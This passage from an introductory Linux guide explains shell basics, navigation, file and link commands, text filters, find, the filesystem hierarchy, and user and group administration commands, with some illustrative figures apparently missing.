require. In this example, the package shall be called comp. Next, you should
install the package from the command line as follows:
sudo apt-get install comp
Linux also has another advantage over some popular operating systems: the ability to install more than one package at a time, without having to complete one installation before starting the next. It all comes down to what is entered on the command line. An example of this is as follows:
sudo apt-get install comp beta-browser
There are even more advantages (other than convenience) to being able to
install multiple packages. In Linux, these advantages include updating.
Rather than updating each application, one at a time, Linux allows for all the
applications to be updated simultaneously through the update manager.
The Linux repository is diverse, and a proper search through it will help you
to identify a large variety of apps that you will find useful. Should there be an
application that you need which is not available in the repository, Linux will
give you instructions on how you can add separate repositories.
The Command Line
Using Linux allows you to customize your system to fit your needs. For those who are not tech savvy, the distribution's settings are a good place to change things until you get what you want. However, you could spend hours fiddling with the available settings and still fail to find the setup that is perfect for you. Luckily, Linux has a solution, and it comes in the form of the command line. Even though the command line sounds complex, like something that can only be understood by a tech genius, it is quite simple to learn.
The beauty of adjusting your operating system through the command line is that the sky is the limit and creativity can abound.
To begin, you need to use “The Shell”. This is basically a program which takes in commands from your keyboard and ensures that the operating system performs them. You will also need to start a “Terminal”. A terminal is also a program, and it allows you to interact with the shell.
To start a terminal, select the terminal option from the menu. This gives you access to a shell session, where you can begin practicing your commands.
In your shell session, you should see a shell prompt. The prompt shows your username and the name of the machine you are using, followed by a dollar sign. It will appear as follows:
[name@mylinux me] $
If you type something meaningless at this shell prompt, you will see an error message from bash. For example,
[name@mylinux me] $ lmnopqrst
bash: lmnopqrst: command not found
This is an error message where the system lets you know that it is unable to
comprehend the information you put in. If you press the up-arrow key, you
will find that you can go back to your previous command, the lmnopqrst one.
If you press the down arrow key, you will find yourself on a blank line.
This is important to note because you can then see how you end up with a
command history. A command history will make it easier for you to retrace
your steps and make corrections as you learn how to use the command
prompt.
Command Lines for System Information
The most basic and perhaps most useful command lines are those that will
help you with system information. To start, you can try the following:
Command for Date
This is a command that will help you to display the date.
root@compsis:~# date
Thu May 21 12:31:29 IST 2015
Command for Calendar
This command will help display the calendar of the current month, or any
other month that may be coming up.
root@compsis:~# cal
Command for uname
This command is for Unix Name, and it will provide detailed information
about the name of the machine, its operating system and the Kernel.
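As a sketch of what uname can report (the exact strings depend on your machine):

```shell
# Print individual pieces of system information.
uname -s   # kernel name, e.g. Linux
uname -r   # kernel release number
uname -m   # hardware architecture, e.g. x86_64
# Or print everything at once:
uname -a
```

Each flag prints one field; -a combines them all on a single line.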
Navigating Linux Using Command Lines
You can use the command lines in the same way that you would use a mouse,
to easily navigate through your Linux operating system so that you can
complete the tasks you require. In this section, you will be introduced to the
most commonly used commands.
Finding files in Linux is simple: just as files are arranged in order in familiar Windows programs, Linux files follow a hierarchical directory structure. This structure resembles what you would find in a list of folders, and its branches are referred to as directories.
The primary directory within a file system is referred to as a root directory. In
it, you will be able to source files, and subdirectories which could contain
additional sorted files. All files are stored under a single tree, even if there are
several storage devices.
pwd
pwd stands for print working directory. It helps you keep track of the directory you are working in. The command line does not give a graphical representation of the filing structure; however, from the command line interface you can view all the files within a parent directory and all the pathways that exist in a subdirectory.
This is where pwd comes in. Whatever directory you are currently standing in is your working directory. The moment you log in to your Linux operating system, you arrive in your home directory (which is your working directory while you are in it). In this directory, you can find all your files. To identify the name of the directory that you are in, use the pwd command as follows.
[name@mylinux me] $pwd
/home/me
You can then begin exploring within the directory by using the ls command.
ls stands for list files in the directory. Therefore, to view all the files that are
in your working directory, type in the following command and you will see
results as illustrated below.
[name@mylinux me] $ls
Desktop bin linuxcmd
GNUstep ndeit.rpm nsmail
cd
cd stands for change directory. This is the command to use when you want to switch from your working directory and view other files. To use it, you need to know the pathname of the directory you want to move to. There are two different types of pathnames to discern: the absolute pathname and the relative pathname.
The absolute pathname is one that starts at your root directory, and by
following a file path, it will easily lead you to your desired directory.
Suppose the absolute pathname for a directory is /usr/bin: there is a directory known as usr, and another directory named bin within it. If you want to use the cd command to go to this absolute pathname, type the following command:
[name@mylinux me] $ cd /usr/bin
[name@mylinux me] $ pwd
/usr/bin
[name@mylinux me] $ ls
When you enter this information, you would have succeeded in changing
your working directory to /usr/bin.
You can use a relative pathname when you want to change from the new working directory, /usr/bin, to its parent directory, /usr. To do this, type the following:
[name@mylinux me] $cd ..
[name@mylinux me] $pwd
/usr
Using relative pathnames cuts down on the amount of typing you must do on the command line, so it is recommended that you learn to use them as much as possible.
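The difference between absolute and relative pathnames can be sketched with a small practice tree (the directory names here are invented, and the tree is built in a temporary location so nothing on your system is touched):

```shell
# Build a small directory tree to practice in.
base=$(mktemp -d)
mkdir -p "$base/docs/reports"
cd "$base/docs/reports"   # absolute path: works from anywhere
pwd
cd ..                     # relative path: up one level, into docs
pwd
cd "$base"                # absolute path again: straight back to the top
pwd
```

Note how `cd ..` is interpreted relative to wherever you currently are, while the absolute forms always land in the same place.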
When you access files using Linux commands, note that file names are case sensitive. Unlike the files you would find on Windows operating systems and programs, files in Linux do not need file extensions. This is great because it gives you the flexibility of naming files anything you like. One thing to be careful of is application programs: some automatically add extensions to files, and it is these you need to watch out for.
Chapter 7 Introduction to Linux Shell
Shells
!command_number
Typing an exclamation mark followed by a number from the command history runs that command again. If you enter !!, the last command typed runs again.
Sometimes on Linux, the names of programs and commands are too long.
Fortunately, bash itself can complete the names. By pressing the Tab key,
you can complete the name of a command, program, or directory. For
example, suppose you want to use the bunzip2 decompression program. To
do this, type:
bu
Then press Tab. If nothing happens, then there are several possible options
for completing the command. Pressing the Tab key again will give you a list
of names starting with bu. For example, the system has buildhash, builtin,
bunzip2 programs:
$ bu
buildhash builtin bunzip2
$ bu
Type n (bunzip2 is the only name whose third letter is n), and then press Tab. The shell will complete the name, and you need only press Enter to run the command!
Note that bash searches for the program invoked from the command line in the directories defined in the PATH system variable. By default, this directory listing does not include the current directory, indicated by ./ (dot slash). Therefore, to run the prog program from the current directory, you must issue the command ./prog.
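A minimal sketch of this behavior (prog is an invented script name, created in a temporary directory):

```shell
# The shell finds programs via PATH; the current directory is usually
# not on PATH, so a local program must be run with an explicit ./ path.
dir=$(mktemp -d)
cd "$dir"
printf '#!/bin/sh\necho hello from prog\n' > prog
chmod +x prog      # make the script executable
./prog             # runs the local script
# plain `prog` would normally fail with "command not found",
# because . is not in PATH by default
```

This is why installed commands like ls run by name, while your own scripts need the ./ prefix (or a directory on PATH).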
Basic commands
The first tasks that have to be solved in any system are: working with data
(usually stored in files) and managing programs (processes) running on the
system. Below are the commands that allow you to perform the most
important operations on working with files and processes. Only the first of
these, cd, is part of the actual shell, the rest are distributed separately, but are
always available on any Linux system. All the commands below can be run
both in the text console and in graphical mode (xterm, KDE console). For
more information on each command, use the man command, for example:
man ls
cd
Allows you to change the current directory (navigate through the file system). It works with both absolute and relative paths. Suppose you are in your home directory and want to go to its tmp/ subdirectory. To do this, enter the relative path:
cd tmp/
To change to the /usr/bin directory, type (absolute path):
cd /usr/bin/
Some options for using the command are:
cd ..
Makes the parent directory the current one (note the space between cd and ..).
cd -
Allows you to return to the previous directory. The cd command with no
parameters returns the shell to the home directory.
ls
ls (list) lists the files in the current directory. Two main options: -a views all files, including hidden ones; -l displays more detailed information.
rm
This command is used to delete files. Warning: once you delete a file, you cannot restore it! Syntax: rm filename.
This program has several parameters. The most frequently used are: -i requests confirmation before each deletion; -r deletes recursively (including subdirectories and hidden files). Example:
rm -i ~/html/*.html
Removes all .html files in your html directory.
mkdir, rmdir
The mkdir command allows you to create a directory, while rmdir deletes a
directory, provided it is empty. Syntax:
mkdir dir_name
rmdir dir_name
The rmdir command is often replaced by the rm -rf command, which allows
you to delete directories, even if they are not empty.
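The difference between rmdir and rm -rf can be sketched as follows (the directory and file names are invented, and everything happens in a temporary location):

```shell
dir=$(mktemp -d)
cd "$dir"
mkdir project                 # create a directory
touch project/notes.txt       # put a file inside it
# rmdir refuses to remove a non-empty directory:
rmdir project 2>/dev/null || echo "rmdir refused: directory not empty"
# rm -rf removes the directory together with its contents:
rm -rf project
ls                            # project is gone
```

Because rm -rf deletes everything underneath the directory without asking, double-check the path before running it.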
less
less allows you to view text page by page. Syntax:
less filename
It is useful for reviewing a file before editing it. The main use of this command is as the final link in a chain of programs that outputs a significant amount of text, which would not fit on one screen and would otherwise flash by too quickly. To exit less, press q (quit).
grep
This command allows you to find a string of characters in the file. Please note
that grep searches by a regular expression, that is, it provides the ability to
specify a template for searching a whole class of words at once. In the
language of regular expressions, it is possible to make patterns describing, for
example, the following classes of strings: “four digits in a row, surrounded by
spaces”. Obviously, such an expression can be used to search in the text of all
the years written in numbers. The search capabilities for regular expressions
are very wide. For more information, you can refer to the on-screen
documentation on grep (man grep). Syntax:
grep search_string filename
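The "four digits in a row" example from above can be sketched like this (history.txt and its contents are invented for illustration):

```shell
dir=$(mktemp -d)
cd "$dir"
printf 'founded in 1969\nno year here\nrevised in 2003\n' > history.txt
# -E enables extended regular expressions; [0-9]{4} matches
# exactly four digits in a row, so only the lines with years match.
grep -E '[0-9]{4}' history.txt
```

Only the first and third lines are printed, since the middle line contains no four-digit run.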
ps
Displays a list of the processes running on the system.
File operations
Here we consider utilities that work with file system objects: files, directories, devices, as well as file systems in general.
cp
Copies files and directories.
mv
Moves (renames) files.
rm
Removes files and directories.
df
Displays a report on the use of disk space (free space on all disks).
du
Calculates disk space occupied by files or directories.
ln
Creates links to files.
ls
Lists files in a directory, supports several different output formats.
mkdir
Creates directories.
touch
Changes file timestamps (last modified, last accessed), can be used to create
empty files.
realpath
Calculates absolute file name by relative.
basename
Removes the path from the full file name (i.e., shortens the absolute file name
to relative).
dirname
Removes the file name from the full file name (that is, it displays the full
name of the directory where the file is located).
pwd
Displays the name of the current directory.
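The path utilities above can be tried directly; a quick sketch (the example path is arbitrary and need not exist):

```shell
# basename strips the directory part of a path;
# dirname strips the file name part.
basename /usr/local/bin/python   # -> python
dirname /usr/local/bin/python    # -> /usr/local/bin
# pwd simply prints the current directory:
pwd
```

Both commands operate purely on the path string, so they work even if the file does not exist.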
Filters
Filters are programs that read data from standard input, convert it and output
it to standard output. Using filtering software allows you to organize a
pipeline: to perform several sequential operations on data in a single
command. More information about standard I / O redirection and the pipeline
can be found in the documentation for bash or another command shell. Many
of the commands listed in this section can work with files.
cat
combines files and displays them to standard output;
tac
combines files and displays them on standard output, starting from the end;
sort
sorts rows;
uniq
removes duplicate lines from sorted files;
tr
performs the replacement of certain characters in the standard input for other
specific characters in the standard output, can be used for transliteration,
deletion of extra characters and for more complex substitutions;
cut
systematized data in text format can be processed using the cut utility, which
displays the specified part of each line of the file; cut allows you to display
only the specified fields (data from some columns of the table in which the
contents of the cells are separated by a standard character — a tabulation
character or any other), as well as characters standing in a certain place in a
line;
paste
combines data from several files into one table, in which the data from each
source file make up a separate column;
csplit
divides the file into parts according to the template;
expand
converts tabs to spaces;
unexpand
converts spaces to tabs;
fmt
formats the text in width;
fold
transfers too long text lines to the next line;
nl
numbers file lines;
od
displays the file in octal, hexadecimal and other similar forms;
tee
duplicates the standard output of the program in a file on disk;
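Filters become useful when chained into a pipeline. A minimal sketch combining a few of the commands above (fruit.txt and its contents are invented for the example):

```shell
dir=$(mktemp -d)
cd "$dir"
printf 'banana\napple\nbanana\ncherry\napple\n' > fruit.txt
# Pipeline: sort the lines, drop duplicates, then number the result.
sort fruit.txt | uniq | nl
# Count how many times each line occurs:
sort fruit.txt | uniq -c
# tr transliterates characters, here lower case to upper case:
tr 'a-z' 'A-Z' < fruit.txt
```

Each filter reads the previous command's standard output, so arbitrary chains can be built without temporary files.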
Other commands
head
displays the initial part of the file of the specified size;
tail
outputs the final part of a file of a given size; because it can output data as it is added to the end of the file, it is used to track log files, etc.;
echo
displays the text of the argument on the standard output;
false
does nothing and exits with return code 1 (error); can be used in shell scripts where a command that always fails is needed;
true
does nothing and exits with return code 0 (success); can be used in scripts where a command that always succeeds is needed;
yes
infinitely prints the same line (by default, yes) until it is interrupted.
seq
displays a series of numbers in a given range of successively increasing or
decreasing by a specified amount;
sleep
suspends execution for a specified number of seconds;
usleep
suspends execution for a specified number of microseconds;
comm
compares 2 pre-sorted (by the sort command) files line by line, displays a
table of three columns, where in the first are lines unique to the first file, in
the second are unique to the second, in the third they are common to both
files;
join
combines the lines of two files on a common field: for each pair of input lines with identical common fields, it prints a line to standard output; by default the first field is taken as the common one, and fields are separated by whitespace;
split
splits the file into pieces of a given size.
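A few of these commands are easy to try together; seq pairs naturally with head and tail:

```shell
seq 1 10 | head -3   # first three numbers: 1 2 3
seq 1 10 | tail -2   # last two numbers: 9 10
seq 2 2 10           # start 2, step 2, end 10: 2 4 6 8 10
```

With three arguments, seq takes the start, the increment, and the end of the range.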
Calculations
In addition to simple operations with strings (input/output and merging), it is
often necessary to perform some calculations on the available data. Listed
below are utilities that perform calculations on numbers, dates, strings.
test
returns true or false depending on the evaluation of its arguments; the test command is useful in scripts for checking conditions;
date
displays and sets the system date, in addition, it can be used for calculations
over dates;
expr
evaluates expressions;
md5sum
calculates checksum using MD5 algorithm;
sha1sum
calculates checksum using SHA1 algorithm;
wc
counts the number of lines, words, and characters in the file;
factor
decomposes numbers into prime factors;
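A quick sketch of the calculation utilities in action:

```shell
# expr evaluates a simple expression (note the spaces around +):
expr 2 + 3                          # prints 5
# wc -w counts words on its input:
printf 'one two three\n' | wc -w    # prints 3
# factor decomposes a number into prime factors:
factor 12                           # prints 12: 2 2 3
```

For anything beyond integer arithmetic, shells typically delegate to external tools such as these.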
Search
The search for information in the file system can be divided into search by file attributes (understood broadly, that is, including the name, path, and so on) and search by content. For these types of search, the programs find and grep, respectively, are usually used. Thanks to convenient interprocess communication tools, these two types of search are easy to combine, that is, to search for the necessary information only in files with the necessary attributes.
Attribute search
The main search tool for file attributes is the find program. A generalized call
to find looks like this: find path expression, where path is a list of directories
in which to search, and expression is a set of expressions that describe the
criteria for selecting files and the actions to be performed on the files found.
By default, the names of found files are simply output to standard output, but
this can be overridden and the list of names of found files can be transferred
to any command for processing. By default, find searches in all subdirectories
of directories specified in the path list.
Expressions
Expressions that define file search criteria consist of key-value pairs. Some of
the possible search options are listed below:
-amin, -anewer, -atime
The time of the last access to the file. Allows you to search for files that were
opened for a certain period of time, or vice versa, for files that nobody has
accessed for a certain period.
-cmin, -cnewer, -ctime
The time the file was last changed.
-fstype
The type of file system on which the file is located.
-gid, -group
The group that owns the file.
-name, -iname
Match the file name to the specified pattern.
-regex, -iregex
Match the file name to a regular expression.
-path, -ipath
Match the full file name (with the path) to the specified pattern.
-perm
Access rights.
-size
File size.
-type
File type.
Actions
The find program can perform various actions on the found files. The most
important of them are:
-print
Output the file name to the standard output (the default action);
-delete
delete a file;
-exec
execute the command by passing the file name as a parameter.
You can read about the rest in the on-screen documentation for the find
command, by issuing the man find command.
Options
Parameters affect the overall behavior of find. The most important of them
are:
-maxdepth
maximum search depth in subdirectories;
-mindepth
minimum search depth in subdirectories;
-xdev
Search only within the same file system (do not descend into directories on other file systems).
You can read about the rest in the on-screen documentation for the find
command.
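Combining attribute search with content search, as described above, can be sketched like this (the file tree and the TODO marker are invented for the example):

```shell
dir=$(mktemp -d)
cd "$dir"
mkdir -p src docs
printf 'TODO: fix the parser\n' > src/main.c
printf 'all done here\n'        > docs/readme.txt
# Attribute search: all .c files under the current directory.
find . -name '*.c'
# Combined with content search: list only the .c files containing TODO.
find . -name '*.c' -exec grep -l TODO {} +
```

The -exec action hands the found file names to grep, so the two kinds of search run in a single command.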
Terminals
The terminal in Linux is a program that provides the user with the ability to
communicate with the system using the command line interface. Terminals
allow you to transfer to the system and receive only text data from it. The
standard terminal for the Linux system can be obtained on any textual virtual
console, and in order to access the command line from the graphical shell,
special programs are needed: terminal emulators. Listed below are some of
the terminal emulators and similar programs included in the ALT Linux 2.4
Master distribution.
xterm
Programs: resize, uxterm, xterm.
Standard terminal emulator for the X Window System. This emulator is
compatible with DEC VT102 / VT220 and Tektronix 4014 terminals and is
designed for programs that do not use the graphical environment directly. If the operating system supports reporting changes in the terminal window size (for example, the SIGWINCH signal in systems derived from 4.3BSD), xterm can inform the programs running in it that the window size has changed.
aterm
Aterm is a color terminal emulator based on rxvt version 2.4.8, supplemented with NeXT-style scrollbars by Alfredo Kojima. It is intended to replace xterm if you do not need Tektronix 4014 terminal emulation.
console-tools
Programs: charset, chvt, codepage, consolechars, convkeys, deallocvt, dumpkeys, fgconsole, setkeycodes, setleds, setmetamode, setvesablank, showcfont, showkey, splitfont, unicode_stop, vcstime, vt-is-UTF8, writevt.
This package contains tools for loading console fonts and keyboard layouts.
It also includes a variety of fonts and layouts.
If it is installed, its tools are used during boot and login to establish the system-wide and personal configuration of the console.
screen
The screen utility allows you to execute console programs when you cannot
control their execution all the time (for example, if you are limited to session
access to a remote machine).
For example, you can perform multiple interactive tasks on a single physical
terminal (remote access session) by switching between virtual terminals using
a screen installed on a remote machine. Or this program can be used to run
programs that do not require direct connection to the physical terminal.
Install the screen package if you may need virtual terminals.
vlock
The vlock program allows you to block input when working in the console.
Vlock can block the current terminal (local or remote) or the entire system of
virtual consoles, which allows you to completely block access to all consoles.
Unlocking occurs only after successful authorization of the user who initiated
the console lock.
Chapter 8 Basic Linux Shell Commands
Introduction
We are now going to look at some useful commands for file handling and similar uses. Before going into more detail, let's look at the Linux file structure.
Linux stores files in a structure known as the virtual directory structure. This is a single directory structure that incorporates all storage devices into one tree; each storage device is represented as a file. If you examine the path of a file, you do not see any disk information. For instance, the path to my desktop is /home/jan/Desktop, which displays no disk information. This way, you do not need to know the underlying architecture.
If you add another disk to the existing system, you simply use mount point directories to attach it. Everything is connected to the root.
This file naming is based on the FHS (Filesystem Hierarchy Standard). Let's look at the common directories once more; we already went through the directory types during the installation.
Table: Linux directory types
Directory Purpose
/ This is the root directory, the upper-most level.
/bin This is the binary store. GNU utilities (user-level) exist in this
directory.
/boot This is where the system stores the boot directory and files
used during the boot process.
/dev Device directory and nodes.
/etc This is where the system stores the configuration files.
/home Home of user directories.
/lib System and application libraries.
/media This is where media is mounted, media such as CDs, USB
drives.
/mnt Where the removable media is mounted to.
/opt Optional software packages are stored here.
/proc Process information – not open for users.
/root Home directory of root.
/run Runtime data is stored here.
/sbin System binary store. Administrative utilities are stored here.
/srv Local services store their files here.
/sys System hardware information is stored here.
/tmp This is the place for temporary files.
/usr This is where user-installed software is stored.
/var Variable directory where dynamic files such as logs are stored.
Change the directory location using the cd command. Here we use the
absolute path.
Here, the dir command lists directories under my current folder. I could
jump to desktop folder using the command cd Desktop.
There are 2 special characters when it comes to directory traversal. Those are
‘.’ And ‘..’. Single dot represents the current directory. Double dots represent
the upper folder.
You can also use '..' to skip typing full folder paths. For instance, you
can go back one level and then go forward: go up to the home folder and
then forward (down) into the Music folder.
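This traversal can be sketched quickly; the /tmp paths below are made up purely for illustration:

```shell
# Build a throwaway folder layout to practice '.' and '..'.
mkdir -p /tmp/demo_home/Music
cd /tmp/demo_home/Music

cd ..          # go up one level, into /tmp/demo_home
pwd
cd ./Music     # '.' is the current directory, so this goes down into Music
pwd
cd ../Music    # up to the parent, then forward (down) into Music again
pwd
```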
Listing Files
We use the ls command to list files. This is one of the most popular
commands among Linux users. Below is a list of common ls options and their
uses.
ls -a List all files, including hidden files starting with '.'
ls --color Colored list [=always/never/auto]
ls -d List directories themselves, not their contents
ls -F Append an indicator to entries (one of */=>@|)
ls -i List the inode index numbers
ls -l List in long format, including permissions
ls -la Same as above, including hidden files
ls -lh Long list in human-readable format
ls -ls Long list with allocated file size
ls -r List in reverse order
ls -R List recursively (the directory tree)
ls -s List allocated file size
ls -S Sort by file size
ls -t Sort by date/time
ls -X Sort by extension name
Let’s examine a few commands. Remember, you can use more than one
argument. E.g., ls -la
Syntax: ls [option ...] [file]...
Detailed syntax:
ls [-a | --all] [-A | --almost-all] [--author] [-b | --escape]
[--block-size=size] [-B | --ignore-backups] [-c] [-C] [--color[=when]]
[-d | --directory] [-D | --dired] [-f] [-F | --classify] [--file-type]
[--format=word] [--full-time] [-g] [--group-directories-first]
[-G | --no-group] [-h | --human-readable] [--si]
[-H | --dereference-command-line] [--dereference-command-line-symlink-
to-dir] [--hide=pattern] [--indicator-style=word] [-i | --inode]
[-I | --ignore=pattern] [-k | --kibibytes] [-l] [-L | --dereference]
[-m] [-n | --numeric-uid-gid] [-N | --literal] [-o]
[-p | --indicator-style=slash] [-q | --hide-control-chars]
[--show-control-chars] [-Q | --quote-name] [--quoting-style=word]
[-r | --reverse] [-R | --recursive] [-s | --size] [-S] [--sort=word]
[--time=word] [--time-style=style] [-t] [-T | --tabsize=cols]
[-u] [-U] [-v] [-w | --width=cols] [-x] [-X] [-Z | --context] [-1]
Example: ls -l setup.py
This gives long list style details for this specific file.
More examples
List the contents of your home directory: ls
List the contents of each subdirectory: ls */
Display only the directories of the current directory: ls -d */
List the contents of root: ls /
List the files with the following extensions: ls *.{htm,sh,py}
List the details of a file, suppressing the error if it is not found: ls -l
myfile.txt 2>/dev/null
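A minimal sketch tying a few of these options together; the scratch directory and file names here are invented for the example:

```shell
# Set up a scratch directory with a regular file, a hidden file and a subfolder.
mkdir -p /tmp/ls_demo/sub
touch /tmp/ls_demo/a.txt /tmp/ls_demo/.hidden
cd /tmp/ls_demo

ls          # plain listing: a.txt and sub (the hidden file is not shown)
ls -a       # adds . .. and .hidden
ls -la      # long format, hidden files included
ls -d */    # only the directories: sub/
ls *.txt    # glob match: a.txt
```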
A word on /dev/null
/dev/null is an important location. This is actually a special file called the
null device. There are other names, such as blackhole or bit-bucket.
When something is written to this file, it is immediately discarded, and
reading from it returns an end-of-file (EOF).
When a process or a command produces an error, it writes it to STDERR (the
standard error), the default file descriptor for error output. These errors
are displayed on screen. If you want to suppress them, that is where the
null device becomes handy.
We often see this written as > /dev/null 2>&1. For instance,
ls -l > /dev/null 2>&1
What do the 2 and &1 mean? The file descriptor for Standard Input (stdin)
is 0. For Standard Output (stdout), it is 1. For Standard Error (stderr) it is 2.
Here, stdout is redirected to /dev/null, and 2>&1 then sends stderr to the
same place, so any error generated by the ls command is discarded
immediately.
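A small sketch of both forms; the path is deliberately nonexistent so that ls fails:

```shell
# Suppress only the error text; '|| true' keeps the script going
# even though ls exits with a nonzero status.
ls /no/such/path 2>/dev/null || true

# Discard both streams: stdout goes to /dev/null first,
# then 2>&1 points stderr at the same place.
ls /no/such/path > /dev/null 2>&1 || true
echo "nothing was printed by the two ls commands above"
```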
ls Color Codes
These color codes distinguish the file types quite well.
Let's run ls -lasSt
This uses the long list format, displays all files along with their
allocated sizes, and sorts the output. Now, you need to understand what
these values are.
1. The allocated size in blocks (here 4), shown because of the -s option.
2. In the next section d is for directory.
3. The next few characters represent permissions (r-read, w-write,
x-execute).
4. Number of hard links.
5. File owner.
6. File owner’s group.
7. Byte size.
8. Last modified time (sort by).
9. File/Directory name.
If you add -i to the command (with S removed, so the list is sorted by last
modified time), you see the inode numbers in the left-most column.
Example: ls -laxo
Here, to view the last access time you use the --time parameter in the ls
command. With only ls -l, it displays the last modified time, not the last
access time.
Copying Files
To copy files, use the cp command.
Syntax: cp [option]... [-T] source destination
Example: cp test1.txt test2.txt
Copy a file to the present working directory using the relative path. Here we
will use ‘.’ to denote the pwd.
Recursively copy files and folders.
Example: cp -R copies the folder snapt, with its files, to snopt.
Let's copy a set of files recursively from one directory to another.
Command: cp -R ./Y/snapt/test* ./Y/snopt
If you check the inodes you will see these are different files:
- 279185 test1.txt
- 1201056 testn.txt
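You can reproduce the inode comparison yourself; the file names below are invented:

```shell
# A copy is an independent file: same content, different inode.
mkdir -p /tmp/cp_demo
cd /tmp/cp_demo
echo "hello" > test1.txt
cp test1.txt test2.txt

ls -i test1.txt test2.txt   # two different inode numbers
cmp test1.txt test2.txt     # no output: the contents are identical
```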
When you create symlinks, the destination file should not already exist (in
particular, a directory with the destination symlink name should not be
there). However, you can force the command to create or replace the file.
If you wish to overwrite symlinks, you have to use -f as stated above.
If you want to repoint a symlink from one target to another, use -n.
Example: I have two directories, dir1 and dir2, on my desktop. I create a
symlink to dir1 named sym. Then I want to link sym to dir2 instead. If I use
-s and -f together (-sf) it does not work as expected. The option to use
here is -n.
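The dir1/dir2 example can be sketched like this; the paths under /tmp are illustrative:

```shell
mkdir -p /tmp/ln_demo/dir1 /tmp/ln_demo/dir2
cd /tmp/ln_demo

ln -s dir1 sym     # sym -> dir1
readlink sym       # prints: dir1

# -f alone would follow sym into dir1; -n treats the existing
# link as a plain file, so the link itself is replaced.
ln -sfn dir2 sym   # sym -> dir2
readlink sym       # prints: dir2
```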
Unlinking
To remove the symlinks you can use the following commands.
- Syntax: unlink linkname
- Syntax: rm linkname
Creating Hard Links
Now we will look at creating hard links. A hard link creates another name
for the same file; both names point to the same data on disk.
Example: ln test1.txt hard_link
Here we do not see any symbolic representation; the new name refers to an
actual physical file. And if you look at the inodes, you will see both
files have the same inode number.
Creating a symbolic link does not increment the hard-link count of the
target file. See the following example: after the original is deleted,
hard_link's link count drops to 1, while the symbolic link becomes broken,
in what we call an orphan state.
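A short sketch of the shared-inode behaviour described above (file names invented):

```shell
mkdir -p /tmp/hl_demo
cd /tmp/hl_demo
echo "data" > test1.txt
ln test1.txt hard_link      # hard link: a second name for the same inode

ls -li test1.txt hard_link  # same inode number, link count 2 on both
rm test1.txt
cat hard_link               # prints: data  (the content survives)
ls -l hard_link             # the link count is back down to 1
```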
File Renaming
Next, we will look at how file renaming works. For this the command
used is mv. mv stands for “move”.
Syntax: mv [options] source dest
Example: mv LICENSE LICENSE_1
You must be cautious when you use this command. If you do the following,
what would happen?
One advantage of this command is that you can move and rename the file all
together, especially when you do it from one location to another.
Example: Moving /home/jan/Desktop/Y/snapt to the Desktop while renaming it
to Snap. This is similar to a cut and paste on Windows, except for the
renaming part.
Example: mv /home/jan/Desktop/Y/snapt/ ./Snap
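Both uses of mv, rename in place and move-plus-rename, can be sketched together; the folder names mirror the example above but live under /tmp:

```shell
mkdir -p /tmp/mv_demo/Y/snapt
cd /tmp/mv_demo
touch LICENSE

mv LICENSE LICENSE_1    # rename in the current directory
mv ./Y/snapt ./Snap     # move the folder up one level and rename it
ls                      # shows LICENSE_1, Snap and Y
```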
Removing Files
To remove files, use the rm command. By default, rm does not ask whether
you want to delete the file, so you should use the -i option with it.
Syntax: rm [OPTION]... FILE...
Managing Directories
There is a set of commands to create and remove directories.
To create a directory, use the mkdir command.
To remove a directory, use the rmdir command.
Syntax: mkdir [-m=mode] [-p] [-v] [-Z=context] directory [directory ...]
rmdir [-p] [-v | --verbose] [--ignore-fail-on-non-empty] [directory ...]
Example: Creating a set of directories with the mkdir command. To create a
tree of directories you must use -p. If you try without it, you won’t succeed.
You have to remove the files first in order to remove the directory. In this
case, you can use another command to do this recursively.
Example: rm -rf /Temp
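The directory commands above, sketched together in a scratch location (the Temp tree here is illustrative):

```shell
cd /tmp
mkdir -p Temp/a/b/c   # -p creates all the missing parent directories
rmdir Temp/a/b/c      # rmdir only removes a directory if it is empty

touch Temp/a/file.txt
rm -rf Temp           # -r recurses into the tree, -f skips the prompts
```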
Creating files with cat is also possible. The following command can create a
file.
Example: cat >testy
The cat command can be used with two familiar commands we used earlier:
less and more.
Example: cat test.txt | more
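A sketch of creating a file with cat and paging it; a here-document stands in for typing at the keyboard, and the file name is invented:

```shell
# 'cat > file' normally reads from the keyboard until Ctrl+D;
# a here-document supplies that input non-interactively.
cat > /tmp/testy <<'EOF'
first line
second line
EOF

cat /tmp/testy          # print the whole file
cat /tmp/testy | more   # page through it one screen at a time
```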
1. PATH
2. PS1
3. TMPDIR
4. EDITOR
5. DISPLAY
Try echoing their values, but don't change them, as doing so can affect the
working of your Linux installation:
[root@archserver ~]# echo $PS1
[\u@\h \W]\$
[root@archserver ~]# echo $EDITOR
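A read-only sketch of inspecting these variables; some of them may be empty in a non-interactive shell:

```shell
echo "$PATH"              # where the shell searches for commands
echo "$PS1"               # the prompt string, e.g. [\u@\h \W]\$
echo "${EDITOR:-unset}"   # default editor, with a fallback if unset
echo "${TMPDIR:-/tmp}"    # temp directory, defaulting to /tmp
echo "$DISPLAY"           # the X display in use, if any
```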
-g, --gid GROUP Specify the primary group of the user
-a, --append Used with the -G option to add the user to the
specified supplementary groups without removing
the user from other groups
-m, --move-home Move the user's home directory to a new location
(used together with the -d option)
-s, --shell SHELL Change the login shell of the user
-L, --lock Lock the user account
● userdel username deletes the user from the /etc/passwd file but does not
delete the home directory of that user.
userdel -r username deletes the user from /etc/passwd and deletes their home
directory along with its content as well.
● id displays the user details of the current user, which includes the UID
of the user and group memberships.
id username will display the details of the user specified, which includes the
UID of the user and group memberships.
● passwd username is a command that can be used to set the user’s initial
password or modify the user’s existing password.
The root user has the power to set the password to any value. If the criteria
for password strength are not met, a warning message will appear, but the
root user can retype the same password and set it for a given user anyway.
A regular user, by contrast, must select a password that is at least 8
characters long, is not the same as the username or a previous password,
and is not a word that can be found in the dictionary.
● UID Ranges are ranges that are reserved for specific purposes in
Red Hat Enterprise Linux 7
UID 0 is always assigned to the root user.
UIDs 1-200 are assigned statically by the system to system processes.
UIDs 201-999 are assigned to system processes that do not own files on the
system. They are assigned dynamically whenever installed software requests
a process.
UID 1000+ are assigned to regular users of the system.
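These ranges can be sketched with a little awk over passwd-style records; the sample lines below are made up rather than read from a real /etc/passwd:

```shell
# Classify each record by its UID (the third colon-separated field).
sample='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
student:x:1000:1000:Student:/home/student:/bin/bash'

echo "$sample" | awk -F: '{
    uid = $3
    if (uid == 0)        kind = "root"
    else if (uid < 1000) kind = "system"
    else                 kind = "regular user"
    print $1, uid, kind
}'
```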
Managing Group Accounts
In this section, we will learn about how to create, modify, and delete group
accounts that have been created locally.
It is important that the group already exists before you can add users to a
group. There are many tools available on the Linux command line that will
help you to manage local groups. Let us go through these commands used for
groups one by one.
● groupadd groupname is a command that, used without any options, creates a
